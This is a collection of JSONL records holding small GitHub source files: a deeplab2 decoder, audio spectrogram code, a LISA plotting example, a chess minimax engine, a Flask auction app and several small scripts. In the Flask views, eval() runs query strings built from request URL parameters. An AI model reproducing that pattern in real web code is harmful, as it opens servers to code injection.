tf.keras.layers.BatchNormalization,\n num_blocks: Tuple[int, int, int] = (2, 2, 2),\n num_mask_slots: int = 128,\n transformer_decoder_drop_path_keep_prob: float = 1.0):\n \"\"\"Initializes a KMaXTransformerDecoder.\n\n Args:\n name: A string, the name of the model.\n auxiliary_predictor_func: A callable function that returns an\n initialization of auxiliary predictor.\n norm_layer: An optional tf.keras.layers.Layer that computes the\n normalization (default: tf.keras.layers.BatchNormalization).\n num_blocks: A list of three integers specifying number of blocks for\n each stage. The stage is counted backwards, i.e., from output stride\n 32, 16, and 8.\n num_mask_slots: An integer, the number of mask slots that will be used.\n transformer_decoder_drop_path_keep_prob: A float, the drop-path keep prob\n for transformer decoder.\n Raises:\n ValueError: If the length of num_blocks is not 3.\n \"\"\"\n super().__init__(name=name)\n\n if len(num_blocks) != 3:\n raise ValueError('Expect the length of num_blocks to be 3!')\n\n self._kmax_decoder = []\n for index, feature_output_stride in enumerate([32, 16, 8]):\n for i in range(num_blocks[index]):\n kmax_decoder_fn = transformer_decoder_block(\n name=f'kmax_transformer_decoder_os{feature_output_stride}_{i}',\n bn_layer=norm_layer,\n auxiliary_predictor_func=auxiliary_predictor_func,\n drop_path_keep_prob=transformer_decoder_drop_path_keep_prob)\n self._kmax_decoder.append(kmax_decoder_fn)\n\n self._cluster_centers = self.add_weight(\n name='cluster_centers',\n shape=(1, num_mask_slots, 256),\n initializer=tf.keras.initializers.TruncatedNormal(stddev=1.0),\n trainable=True)\n\n self._class_embedding_projection = convolutions.Conv1D(\n 256,\n 'class_embedding_projection',\n use_bias=False,\n use_bn=True,\n bn_layer=norm_layer,\n activation='gelu')\n\n self._mask_embedding_projection = convolutions.Conv1D(\n 256,\n 'mask_embedding_projection',\n use_bias=False,\n use_bn=True,\n bn_layer=norm_layer,\n activation='gelu')\n\n self._num_blocks = num_blocks\n self._num_mask_slots = num_mask_slots\n\n def _prepare_cluster_centers(self, input_tensor, training=False):\n batch_size = tf.shape(input_tensor)[0]\n cluster_centers = tf.tile(self._cluster_centers, [batch_size, 1, 1])\n return cluster_centers\n\n def call(self, endpoints, training=False):\n # Make a copy so that input argument will not be modified, per requirements\n # from exporting a saved model.\n endpoints = dict(endpoints)\n\n # Apply kMaX decoder on pixel features at output stride 32, 16, and 8\n # respectively to update the cluster centers.\n feature_dict = {\n 32: endpoints['decoder_stage1'],\n 16: endpoints['decoder_stage2'],\n 8: endpoints['decoder_stage3']}\n cluster_centers = self._prepare_cluster_centers(feature_dict[32],\n training=training)\n auxiliary_outputs = ()\n current_transformer_idx = 0\n for index, feature_output_stride in enumerate([32, 16, 8]):\n for _ in range(self._num_blocks[index]):\n (_, cluster_centers, auxiliary_outputs) = (\n self._kmax_decoder[current_transformer_idx](\n (feature_dict[feature_output_stride], cluster_centers,\n auxiliary_outputs), training=training))\n current_transformer_idx += 1\n\n # Project cluster centers to mask embeddings and class embeddings.\n class_embeddings = self._class_embedding_projection(\n cluster_centers, training=training)\n mask_embeddings = self._mask_embedding_projection(\n cluster_centers, training=training)\n # Prepare endpoints for predictor.\n endpoints['transformer_class_feature'] = class_embeddings\n endpoints['transformer_mask_feature'] = mask_embeddings\n endpoints['feature_panoptic'] = endpoints['decoder_output']\n endpoints['feature_semantic'] = endpoints['stage5']\n endpoints[common.PRED_AUXILIARY_OUTPUTS] = auxiliary_outputs\n\n return endpoints\n","repo_name":"google-research/deeplab2","sub_path":"model/transformer_decoder/kmax.py","file_name":"kmax.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","stars":949,"dataset":"github-code","pt":"83"} +{"seq_id":"70931689871","text":"import numpy as np\nimport librosa as lr\nimport h5py\nimport time\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport IPython.display as ipd\n\nfrom skimage.util.shape import view_as_windows\n\nPATH = '/mnt/c/svdcvt/teacher/sirius/'\nPATH1 = os.path.join(PATH, 'dataset/')\n\n\ndef to_melspec(ar, n_fft=2048):\n return lr.amplitude_to_db(lr.feature.melspectrogram(ar, n_fft=n_fft))\n\ndef file_to_segments(file, sr=22050, duration=3, step=2):\n if isinstance(file, (str)):\n file, sr = lr.load(path=file, sr=sr)\n elif isinstance(file, (np.ndarray)):\n pass\n else:\n raise ValueError()\n \n file_duration = len(file) / sr\n segm_ticks = duration * sr\n step_ticks = step * sr\n if file_duration < duration:\n segments = np.tile(file, segm_ticks // len(file) + 1)[:segm_ticks][None, :]\n else:\n segments = view_as_windows(file, window_shape=(segm_ticks, ), step=step_ticks)\n del file\n return segments\n \ndef track_to_spectrograms(track_path, duration=3, sr=22050, n_fft=2048, save_path='./dataset.hdf5'):\n '''\n Arguments:\n path: str \n list of paths to audio samples\n duration: float\n duration of segment in seconds\n sr: int\n sample rate\n n_fft: int \n parameter of stft (other parameters need to be default)\n save_path: str\n saves dataset to .hdf5 format\n \n '''\n segments = file_to_segments(track_path, sr=sr, duration=duration, step=duration)\n melspec_segments = []\n for i, segment in enumerate(segments):\n melspec_segments.append(to_melspec(segment))\n return melspec_segments","repo_name":"Jur1jo/fairywinx_bot","sub_path":"music_to_spectograms.py","file_name":"music_to_spectograms.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35113010669","text":"\"\"\"\n=========================\nDirectional LISA Plotting\n=========================\n\nA directional LISA plot can be used to examine the spatial dynamics of a process.\nBy placing a local indicator of spatial association (LISA) in a dynamic context, insights on directional biases,\nco-movements, space-time hot-spots (and cold-spots) can be generated.\n\nIn this example, we use data on state per-capita incomes for the lower 48 US states that we will first process:\n\"\"\"\n\nimport libpysal as lps\nimport numpy as np\nfrom giddy.directional import Rose\nf = open(lps.examples.get_path('spi_download.csv'), 'r')\nlines = f.readlines()\nf.close()\n\n\nlines = [line.strip().split(\",\") for line in lines]\nnames = [line[2] for line in lines[1:-5]]\ndata = np.array([list(map(int, line[3:])) for line in lines[1:-5]])\n\n\n#############################\n# We can omit the BEA regions and focus only on the lower 48 states\n# and place incomes on relative terms:\n\nsids = range(60)\nout = ['\"United States 3/\"',\n '\"Alaska 3/\"',\n '\"District of Columbia\"',\n '\"Hawaii 3/\"',\n '\"New England\"','\"Mideast\"',\n '\"Great Lakes\"',\n '\"Plains\"',\n '\"Southeast\"',\n '\"Southwest\"',\n '\"Rocky Mountain\"',\n '\"Far West 3/\"']\n\nsnames = [name for name in names if name not in out]\nsids = [names.index(name) for name in snames]\nstates = data[sids,:]\nus = data[0]\nyears = np.arange(1969, 2009)\nrel = states/(us*1.)\nY = rel[:, [0, -1]]\n\n###############################################################################\n# Spatial Weights\n# ---------------\n#\n# We will use a simple contiguity structure to define neighbors. The file\n# states48.gal encodes the adjacency structure of the 48 states. We read this in\n# and row-normalize the weights:\n\ngal = lps.open(lps.examples.get_path('states48.gal'))\nw = gal.read()\nw.transform = 'r'\n\n##########################################\n# Visualization\n# ==============\n#\n# The Rose class creates a circular histogram that can be used to examine the distribution\n# of LISA Vectors across segments of the histogram:\n\n\n\nr4 = Rose(Y, w, k=4)\n\n\n\n##########################################\n# LISA Vectors\n# ------------\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. Inference is based on random spatial permutations under the null.\n\n\n\nr4.plot_vectors() # lisa vectors\n\n\n\n\n##########################################\n# LISA Vectors Origin Standardized\n# ================================\n#\n# As the LISA vectors combine the locations of a give LISA statistic in two different time periods, it can be useful\n# to standardize the vectors to look for directional biases in the movements:\n\n\nr4.plot_origin() # origin standardized\n\n\n##########################################\n# LISA Plot\n# =========\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. Inference is based on random spatial permutations under the null.\n\n\n\nr4.plot() # Polar\n\n##########################################\n# Conditional LISA Plot (Focal)\n# =============================\n#\n# Here we condition on the relative starting income of the focal units:\n\n\nr4.plot(attribute=Y[:,0]) # condition on starting relative income\n\n##########################################\n# Conditional LISA Plot (Spatial Lag)\n# ===================================\n#\n# Here we condition on the relative starting income of the\n# neighboring units:\n\n\n\nr4.plot(attribute=r4.lag[:,0]) # condition on lag of starting relative income\n\n##########################################\n# Inference\n# ==========\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. Inference is based on random spatial permutations under the null.\n\n\nprint(r4.cuts)\nprint(r4.counts)\nnp.random.seed(1234)\nr4.permute(permutations=999)\nprint(r4.p)\n\n\n################################################\n# Here all the four sector counts are significantly different from their expectation under the null.\n# A directional test can also be implemented. Here the direction of the departure from the null due to positive co-movement of a focal unit and its spatial lag over the time period results in two two general cases. For sectors in the positive quadrants (I and III), the observed counts are considered extreme if they are larger than expectation, while for the negative quadrants (II, IV) the observed counts are considered extreme if they are small than the expected counts under the null.\n\n\n\nr4.permute(alternative='positive', permutations=999)\nprint(r4.p)\n\n######################################\n# The expected values are:\n\n\nprint(r4.expected_perm)\n\n######################################\n# Finally, a directional alternative reflecting negative association between the movement of the focal unit and its lag has the complimentary interpretation to the positive alternative: lower counts in I and III, and higher counts in II and IV relative to the null.\n\n\nr4.permute(alternative='negative', permutations=999)\nprint(r4.p)\n","repo_name":"cmg777/giddy","sub_path":"examples/plot_directional.py","file_name":"plot_directional.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"37873814158","text":"import chess\nimport multiprocessing\nfrom multiprocessing import Manager, Pool\n\nboard = chess.Board()\n\ndef evaluate_board(board):\n\n pawn_white = [\n [0, 0, 0, 0, 0, 0, 0, 0],\n [78, 83, 86, 73, 102, 82, 85, 90],\n [7, 29, 21, 44, 40, 31, 44, 7],\n [-17, 16, -2, 15, 14, 0, 15, -13],\n [-26, 3, 10, 9, 6, 1, 0, -23],\n [-22, 9, 5, -11, -10, -2, 3, -19],\n [-31, 8, -7, -37, -36, -14, 3, -31],\n [0, 0, 0, 0, 0, 0, 0, 0]]\n\n knight_white = [\n [-66, -53, -75, -75, -10, -55, -58, -70],\n [-3, -6, 100, -36, 4, 62, -4, -14],\n [10, 67, 1, 74, 73, 27, 62, -2],\n [24, 24, 45, 37, 33, 41, 25, 17],\n [-1, 5, 31, 21, 22, 35, 2, 0],\n [-18, 10, 13, 22, 18, 15, 11, -14],\n [-23, -15, 2, 0, 2, 0, -23, -20],\n [-74, -23, -26, -24, -19, -35, -22, -69]]\n\n bishop_white = [\n [-59, -78, -82, -76, -23,-107, -37, -50],\n [-11, 20, 35, -42, -39, 31, 2, -22],\n [-9, 39, -32, 41, 52, -10, 28, -14],\n [25, 17, 20, 34, 26, 25, 15, 10],\n [13, 10, 17, 23, 17, 16, 0, 7],\n [14, 25, 24, 15, 8, 25, 20, 15],\n [19, 20, 11, 6, 7, 6, 20, 16],\n [-7, 2, -15, -12, -14, -15, -10, -10]]\n\n rook_white = [[35, 29, 33, 4, 37, 33, 56, 50],\n [55, 29, 56, 67, 55, 62, 34, 60],\n [19, 35, 28, 33, 45, 27, 25, 15],\n [0, 5, 16, 13, 18, -4, -9, -6],\n [-28, -35, -16, -21, -13, -29, -46, -30],\n [-42, -28, -42, -25, -25, -35, -26, -46],\n [-53, -38, -31, -26, -29, -43, -44, -53],\n [-30, -24, -18, 5, -2, -18, -31, -32]]\n\n queen_white = [[6, 1, -8,-104, 69, 24, 88, 26],\n [14, 32, 60, -10, 20, 76, 57, 24],\n [-2, 43, 32, 60, 72, 63, 43, 2],\n [1, -16, 22, 17, 25, 20, -13, -6],\n [-14, -15, -2, -5, -1, -10, -20, -22],\n [-30, -6, -13, -11, -16, -11, -16, -27],\n [-36, -18, 0, -19, -15, -15, -21, -38],\n [-39, -30, -31, -13, -31, -36, -34, -42]]\n\n king_white = [[4, 54, 47, -99, -99, 60, 83, -62],\n [-32, 10, 55, 56, 56, 55, 10, 3],\n [-62, 12, -57, 44, -67, 28, 37, -31],\n [-55, 50, 11, -4, -19, 13, 0, -49],\n [-55, -43, -52, -28, -51, -47, -8, -50],\n [-47, -42, -43, -79, -64, -32, -29, -32],\n [-4, 3, -14, -50, -57, -18, 13, 4],\n [17, 30, -3, -14, 6, -1, 40, 18]]\n\n score = 0\n for i in range(8):\n for j in range(8):\n piece = board.piece_at(i*8 + j)\n if(piece is not None):\n if piece.color == chess.WHITE:\n if piece.piece_type == chess.PAWN:\n score += 100\n score += pawn_white[7-i][j]\n elif piece.piece_type == chess.KNIGHT:\n score += 280\n score += knight_white[7-i][j]\n elif piece.piece_type == chess.BISHOP:\n score += 320\n score += bishop_white[7-i][j]\n elif piece.piece_type == chess.ROOK:\n score += 479\n score += rook_white[7-i][j]\n elif piece.piece_type == chess.QUEEN:\n score += 929\n score += queen_white[7-i][j]\n elif piece.piece_type == chess.KING:\n score += 60000\n score += king_white[7-i][j]\n\n else:\n if piece.piece_type == chess.PAWN:\n score -= 100\n score -= pawn_white[i][j]\n elif piece.piece_type == chess.KNIGHT:\n score -= 280\n score -= knight_white[i][j]\n elif piece.piece_type == chess.BISHOP:\n score -= 320\n score -= bishop_white[i][j]\n elif piece.piece_type == chess.ROOK:\n score -= 479\n score -= rook_white[i][j]\n elif piece.piece_type == chess.QUEEN:\n score -= 929\n score -= queen_white[i][j]\n elif piece.piece_type == chess.KING:\n score -= 60000\n score -= king_white[i][j]\n\n return score\n\ndef minimax(board, depth, alpha, beta, maximizing_player, cache, lock):\n key = (board.fen(), depth, maximizing_player)\n with lock:\n if key in cache:\n return cache[key]\n \n if depth == 0 or board.is_game_over():\n eval = evaluate_board(board)\n with lock:\n cache[key] = eval\n return eval\n\n legal_moves = list(board.legal_moves)\n if maximizing_player:\n max_eval = float('-inf')\n for move in legal_moves:\n board.push(move)\n eval = minimax(board, depth - 1, alpha, beta, False, cache, lock)\n board.pop()\n max_eval = max(max_eval, eval)\n alpha = max(alpha, eval)\n if beta <= alpha:\n break\n with lock:\n cache[key] = max_eval\n return max_eval\n else:\n min_eval = float('inf')\n for move in legal_moves:\n board.push(move)\n eval = minimax(board, depth - 1, alpha, beta, True, cache, lock)\n board.pop()\n min_eval = min(min_eval, eval)\n beta = min(beta, eval)\n if beta <= alpha:\n break\n with lock:\n cache[key] = min_eval\n return min_eval\n\n\ndef get_best_move(board, depth):\n maximizing_player = board.turn\n legal_moves = list(board.legal_moves)\n best_move = None\n max_eval = float('-inf')\n alpha = float('-inf')\n beta = float('inf')\n\n with Manager() as manager:\n cache = manager.dict()\n lock = manager.Lock()\n\n with Pool() as pool:\n results = []\n for move in legal_moves:\n board.push(move)\n result = pool.apply_async(minimax, args=(board, depth - 1, alpha, beta, not maximizing_player, cache, lock))\n board.pop()\n results.append((move, result))\n\n for move, result in results:\n eval = result.get()\n if eval > max_eval:\n max_eval = eval\n best_move = move\n alpha = max(alpha, eval)\n \n return best_move\n\nwhile(True):\n print(evaluate_board(board))\n best_move = get_best_move(board, depth = 6)\n print(best_move)\n board.push(best_move)\n print(board)\n board.push(board.parse_san(input(\"Wpisz ruch przeciwnika: \")))\n print(board)\n","repo_name":"wojtek3/Chess-engine","sub_path":"silniczekmp2.py","file_name":"silniczekmp2.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42278473960","text":"from typing import Tuple, Any\n\nfrom io import BytesIO\nimport os\nimport requests\n\nfrom ....classes import page\nfrom . import chapter\n\nclass MangaDexPage(page.Page):\n def __init__(self, number: int, chapter: 'chapter.MangaDexChapter', data: Any, server=None, file=None):\n super().__init__(number, chapter, data)\n self.file: str = file if file else self.data['file']\n self.server: str = server if server else self.data['server']\n \n def get_image(self) -> Tuple[BytesIO, str]:\n ext = os.path.basename(self.file).split(os.path.extsep)[-1]\n req = requests.get(self.file_url)\n if req.ok:\n data = BytesIO(req.content)\n return data, ext\n return None, None\n \n @property\n def file_url(self) -> str:\n return f'{self.server}/data/{self.chapter.chapter_hash}/{self.file}'\n\n","repo_name":"KamS04/KReader","sub_path":"source/viewer/sources/online/mangadex/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"19835308918","text":"\"\"\"\r\n @AUTHOR: SANCHIT GUPTA\r\n DATE: 10/9/21\r\n PROBLEM: Create a module named “OMG” with the functions “ValidateCreditCard” and “ALLISWELL” in it. Call these functions into\r\n another python script by importing the module “OMG”.\r\n\"\"\"\r\n\r\nimport omg\r\nisvalid = omg.ValidateCreditCard() #isvalid is a boolean variable\r\nprint(\"VALIDITY: \", isvalid)\r\n\r\nomg.ALLISWELL(isvalid)\r\n\r\n","repo_name":"Sanchitgupta910/MCA-python-programming","sub_path":"creditcard.py","file_name":"creditcard.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35341461530","text":"import pickle\n#pkl_file = 'C:/Users/Dirani/ProgrammingProjects/DeepFace_Project/database/representations_deepface.pkl'\npkl_file = r'C:\\Users\\Dirani\\ProgrammingProjects\\DeepFace_Project\\database\\frames_info_الأهل و التلاميذ و الفصحى.pkl'\n#pkl_file = '/home/youssef/PythonProjects/AI/DeepFace_Project/database1/frames_info_teta image.pkl'\n\nwith open(pkl_file, 'rb') as f:\n pkl_data = pickle.load(f)\n\nprint(type(pkl_data), len(pkl_data))\n\nprint(pkl_data[8])\n\"\"\"\ni = 0\nwhile i < len(pkl_data):\n print(i, pkl_data[i][0])\n i += 1\n\n\nperson = []\ni = -1\nfor pkl_item in pkl_data:\n i += 1\n for face in pkl_item['detected_faces']:\n name = face['most_similar']['name']\n if name != \"\": #name == \"fp\"\n person.append([i, name, pkl_item['frame_index']])\n\nprint(person)\n\"\"\"","repo_name":"diraniyoussef/deepface","sub_path":"read_pkl.py","file_name":"read_pkl.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33951656890","text":"from flask import Blueprint, render_template, request, redirect, url_for\nfrom sqlalchemy import desc, asc\nfrom .models import auctionListing, Watchlist, Bid\nfrom flask_login import login_required, current_user\nfrom .submitFields import getURLParams, getSortOrder, getWatchlistSortOrder\nfrom datetime import datetime, timedelta\nfrom . import db\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/') \ndef index():\n isSold = 1\n if(request.args.get('isSold')=='1'):\n isSold = 0\n # Gets a list of all auction items that are currently active\n allActives = auctionListing.query.filter_by(bid_status = isSold).order_by(desc(auctionListing.start_time))\n\n for currentItem in allActives:\n remainingTime = (currentItem.end_time - datetime.now()) # get time\n # close down auction\n if(remainingTime < timedelta(0)):\n currentItem.bid_status = 0\n db.session.commit()\n\n # If there are any URL parameters for filtering, run the getURLParams function to create a new filtering query.\n if(len(request.args)>0):\n auctionItems = eval(f\"auctionListing.query.filter_by(bid_status = {isSold}){getURLParams(request)}.order_by({getSortOrder(request)})\")\n # If not, use the normal query\n else:\n auctionItems = allActives\n # A hot item is selected by choosing the active item that has the most bids.\n hotItem = auctionListing.query.filter_by(bid_status = 1).order_by(desc(auctionListing.total_bids)).first()\n # Recently sold grabs the most recent auction with a non zero selling price\n recentlySold = auctionListing.query.filter(auctionListing.current_bid != 0).filter_by(bid_status = 0).order_by(desc(auctionListing.end_time)).first()\n \n if(isSold == 1):\n return render_template('index.html', items = auctionItems.order_by(desc(auctionListing.start_time)), hotItem = hotItem, recentlySold = recentlySold)\n else:\n return render_template('soldItems.html', items = auctionItems.order_by(desc(auctionListing.start_time)))\n\n@bp.route('/sold')\ndef sold():\n return redirect(url_for('main.index',isSold = 1))\n\n\n@bp.route('/watchlist')\n@login_required\ndef watchlist():\n # The watchlist DB is queried for all items belonging to the logged in user.\n watchlistItems = Watchlist.query.filter_by(user_id=current_user.id)\n if(len(request.args)>0):\n watchlistItems = eval(f\"Watchlist.query.filter_by(user_id=current_user.id).order_by({getWatchlistSortOrder(request)})\")\n watchlistedAuctionItems = []\n # All the watchlist items are compared againsted the auctionListing db and added to a list to be displayed.\n for item in watchlistItems:\n watchlistedAuctionItems += auctionListing.query.filter_by(id=item.item_id)\n\n return render_template('watchlist.html', items=watchlistedAuctionItems)\n\n@bp.route('/profile')\n@login_required\ndef profile():\n # All of the user's listings (completed, and active) are queried using the bid status field.\n activeUserListings = auctionListing.query.filter_by(user_id = current_user.id, bid_status=1)\n completedUserListings = auctionListing.query.filter_by(user_id = current_user.id, bid_status=0)\n\n return render_template('profile.html', myActiveListings=activeUserListings, myCompletedListings = completedUserListings)\n\n\n@bp.route('/bids')\n@login_required\ndef bids():\n bids = Bid.query.filter_by(user_id = current_user.id)\n return render_template('profileBids.html', bids = bids)","repo_name":"BlackIsBlack/teahouse-auctions","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33010869742","text":"# Rachel Friedman - 5/11/13\n\nimport cPickle\nfrom nltk.corpus import wordnet\n\ndef genSyllableDict():\n \"\"\" Creates a dictionary consisting of number of syllables as keys and lists of words as values\"\"\"\n\n syllables = {}\n nums = [str(x) for x in range(15)]\n\n for i in range(0, 15):\n syllables[i] = list()\n\n f = open(\"cmudict.txt\", \"r\") # CMU dictionary: http://www.speech.cs.cmu.edu/cgi-bin/cmudict\n \n for line in f: \n count = 0\n line = line.split(' ')\n word = line[0]\n sylLst = line[1]\n\n for char in sylLst:\n if char in nums:\n count += 1\n \n if word[-1] != ')' and \"'\" not in word and wordnet.synsets(word): # no apostrophes and makes sure the word isn't a proper name\n syllables[count].append(word.lower()) \n\n return syllables\n\nsyllableDict = genSyllableDict()\ncPickle.dump(syllableDict, open(\"syllableDict.txt\", \"wb\")) # saves syllable dictionary for later use so we don't have to generate again","repo_name":"rlfriedman/HaikuGenerator","sub_path":"HaikuGen/syllableDictionary.py","file_name":"syllableDictionary.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"74357235152","text":"shows = [\"SNL\",\"Conan\",\"Talking Dead\",\"Tonight Show\"]\nshowsDict = {}\nfor i in shows:\n showsDict[shows.index(i)] = i\nprint(showsDict)\n\nprompt = input(\"\\nPlease, enter another show and its position in the list using ',': \")\nanotherShow = prompt.split(\",\")[0]\nanotherShowIndex = prompt.split(\",\")[1]\n\nshows = []\nfor i in showsDict:\n shows.append(showsDict[i])\nshows.insert(int(anotherShowIndex), anotherShow)\n\nfor i in shows:\n showsDict[shows.index(i)] = i\nprint(showsDict)\n","repo_name":"heartshapedbox/python","sub_path":"tasks/176_shows.py","file_name":"176_shows.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12589110820","text":"import os\nimport re\nfrom copy import deepcopy\nfrom pyuiuc.url import URL\n\nurl_re = re.compile(r'{}.*'.format(URL.prefix))\nendpoints = URL.endpoints\n\nget_kv = lambda l: {k:k for k in l}\n\ndef generate_valid_params():\n for i in range(len(endpoints)):\n yield endpoints[:i+1]\n\ndef generate_invalid_params():\n for i in xrange(4):\n invalid = deepcopy(endpoints)\n del invalid[i]\n yield invalid\n\ndef get_xml_body(fname='./test.xml'):\n dpth = os.path.dirname(os.path.abspath(__file__))\n pth = os.path.join(dpth, fname)\n with open(pth, 'r') as f: content = f.read()\n return content\n","repo_name":"harshays/pyuiuc","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23883008411","text":"import numpy as np\nfrom scipy.sparse import spdiags\n\ndef spconvert(n, lam):\n \"\"\"Return the n x n C^{(lam)} to C^{(lam+1)} conversion matrix.\"\"\"\n if (lam == 0):\n diags = .5*np.ones([2, n])\n diags[0, 0] = 1\n diags[1, :] = -diags[1, :]\n S = spdiags(diags, [0, 2], n, n)\n else:\n diags = np.zeros([2, n])\n diags[0,:] = lam/(lam + np.arange(n))\n diags[1,:] = lam/(lam + np.arange(n))\n diags[0, 0] = 1\n diags[1, :] = -diags[1, :]\n S = spdiags(diags, [0, 2], n, n)\n return S","repo_name":"Hadrien-Montanelli/chebpy","sub_path":"chebpy/cheb/spconvert.py","file_name":"spconvert.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16759770128","text":"def firstOccurence(arr,ele,start,end):\n ind =-1\n while start < end:\n mid = (start+end)//2\n if arr[mid]==ele:\n ind = mid\n end = mid -1\n elif ele None:\n super().__init__(vertexes)\n self.edges: list[ReflectionSegment] = []\n for i in range(len(vertexes)):\n if i == len(vertexes) - 1:\n self.edges.append(ReflectionSegment(vertexes[i], vertexes[0], reflection_coefficient))\n else:\n self.edges.append(ReflectionSegment(vertexes[i], vertexes[i+1], reflection_coefficient))\n\n @staticmethod\n def from_polygon(polygon: Polygon, reflection_coefficient: float) -> 'ReflectionPolygon':\n return ReflectionPolygon(polygon.vertexes, reflection_coefficient)\n\n\nclass RefractionPolygon(Polygon, LightTransparentMixin):\n def __init__(self, vertexes: list[Point], inner_refraction_coefficient: float,\n outer_refraction_coefficient: float = 1, *, transparensy: float = 1) -> None:\n super().__init__(vertexes)\n LightTransparentMixin.__init__(self, transparensy)\n edges: list[RefractionSegment] = []\n previous_angle = self.edges[-1].reconstruct_line().angle\n for non_optical_edge in self.edges:\n current_angle = non_optical_edge.reconstruct_line().angle\n if current_angle != 0 and previous_angle != 0:\n sample_point = Point(non_optical_edge.endpoints[0].x + .1, non_optical_edge.endpoints[0].y)\n else:\n sample_point = Point(non_optical_edge.endpoints[0].x, non_optical_edge.endpoints[0].y - .1)\n if self.is_point_inside(sample_point):\n edges.append(RefractionSegment(non_optical_edge.endpoints[0], non_optical_edge.endpoints[1],\n inner_refraction_coefficient, outer_refraction_coefficient))\n else:\n edges.append(RefractionSegment(non_optical_edge.endpoints[0], non_optical_edge.endpoints[1],\n outer_refraction_coefficient, inner_refraction_coefficient))\n self.edges: list[RefractionSegment] = edges\n self.inner_refraction_coefficient = inner_refraction_coefficient\n self.outer_refraction_coefficient = outer_refraction_coefficient\n\n @staticmethod\n def from_polygon(polygon: Polygon, inner_refraction_coefficient: float,\n outer_refraction_coefficient: float = 1) -> 'RefractionPolygon':\n return RefractionPolygon(polygon.vertexes, inner_refraction_coefficient, outer_refraction_coefficient)\n\n\nclass ReflectionCircle(Cirlce):\n def __init__(self, centre: Point, radius: float, reflection_coefficient: float = 1) -> None:\n super().__init__(centre, radius)\n self.reflection_coefficient = reflection_coefficient\n\n def get_tangent_line(self, point_on_circumference: Point) -> ReflectionLine:\n tangent_line = super().get_tangent_line(point_on_circumference)\n return ReflectionLine.construct_from_line(tangent_line, self.reflection_coefficient)\n\n\nclass RefractionCircle(Cirlce):\n def __init__(self, centre: Point, radius: float,\n inner_refraction_coefficient: float, outer_refraction_coefficient: float = 1) -> None:\n super().__init__(centre, radius)\n self.inner_refraction_coefficient = inner_refraction_coefficient\n self.outer_refraction_coefficient = outer_refraction_coefficient\n\n\n def get_tangent_line(self, point_on_circumference: Point) -> RefractionLine:\n tangent_line = super().get_tangent_line(point_on_circumference)\n direction = tangent_line.get_direction_to_point(self.centre)\n if direction == 'lod' or direction == 'lou':\n return RefractionLine.construct_from_line(tangent_line, self.inner_refraction_coefficient, self.outer_refraction_coefficient)\n return RefractionLine.construct_from_line(tangent_line, self.outer_refraction_coefficient, self.inner_refraction_coefficient)","repo_name":"leofeen/PhysicsGraphicalEngine","sub_path":"optical/opticalfigures.py","file_name":"opticalfigures.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71696910029","text":"import subprocess\nfrom .env import env\n\n\nfind_module_path_script = r\"\"\"\\\nimport imp\nprint(imp.find_module('{}')[1])\n\"\"\"\n\n\ndef find_module_path(text, py2=False):\n \" Try to find the filesystem location of a Python module. \"\n module_path = subprocess.check_output([\n \"python2\" if py2 else \"python3\",\n \"-c\",\n find_module_path_script.format(text)], env=env())\n return module_path.decode('utf8').strip()\n\n\nget_module_list_script = r\"\"\"\\\nimport pkgutil\nimport os\n\nvalid_names = [\n name for (loader, name, is_pkg) in pkgutil.iter_modules()\n if hasattr(loader, 'path') and (\n os.path.isfile(os.path.join(loader.path, name) + \".py\")\n or os.path.isdir(os.path.join(loader.path, name))\n )\n]\n\nprint(\"\\n\".join(valid_names))\n\"\"\"\n\n\ndef get_module_list(py2=False):\n \" List of names of available modules for an interpreter \"\n try:\n raw_output = subprocess.check_output([\n \"python2\" if py2 else \"python3\",\n \"-c\",\n get_module_list_script], env=env(), stderr=subprocess.STDOUT)\n module_names = [\n line.decode('utf8').strip()\n for line in raw_output.splitlines() if line]\n # Sort names case-insensitive and underbar-names to bottom\n module_names.sort(key=str.upper)\n return module_names\n except subprocess.CalledProcessError as exc:\n print(\"[Pypr] Error when calling python\")\n print(exc.output)\n return 